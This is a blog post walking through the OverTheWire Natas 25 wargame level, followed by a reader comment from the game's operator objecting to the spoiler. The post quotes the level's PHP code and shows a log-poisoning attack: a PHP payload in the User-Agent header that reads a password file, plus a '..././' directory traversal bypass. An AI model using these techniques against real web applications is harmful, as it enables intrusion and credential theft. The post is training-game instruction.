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Sunday, December 15, 2013

OverTheWire Natas 25

Code inspection first !
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/tmp/natas25_" . session_id() .".log","a");
logRequest function let us append arbitrary content to arbitrary file path. Why ?
1. We control $_SERVER['HTTP_USER_AGENT'] which is the value of the User-Agent HTTP header.
2. We control session_id() by PHPSESSID cookie value.

Let's set User-Agent to be the following:
<?php echo file_get_contents('/etc/natas_webpass/natas26') ?>
and PHPSESSID value to be 'pwned'.

So, what we have done until now: if the logRequest function will be called, a PHP code that will print the next level password will be wrote to the file /tmp/natas25_pwned.log.

The last step is to display this code output. We can do it by including /tmp/natas25_pwned.log file content in the page by exploiting the following function which is called on page loading:
function setLanguage(){
    /* language setup */
        if(safeinclude("language/" . $_REQUEST["lang"] ))
            return 1;

function safeinclude($filename){
    // check for directory traversal
        logRequest("Directory traversal attempt! fixing request.");
    // dont let ppl steal our passwords
        logRequest("Illegal file access detected! Aborting!");
    // add more checks...

    if (file_exists($filename)) { 
        return 1;
    return 0;

You can see that safeinclude function gives us hard life by removing '../'. To bypass it we will use the following distinction:
'..././' will become '../' after '../' will be removed. Therefore, we can use it to escape from the 'language/' directory and include arbitrary path (/tmp/natas25_pwned.log)
We will set lang GET parameter to be:

It will trigger the logRequest function because there was a directory traversal attempt and the PHP code we saw earlier will be written to the included file.
Pwned ! :)

1 comment :

  1. Thank you very much for not respecting our no spoiler policy. very sad to see this.
    morla, OTW
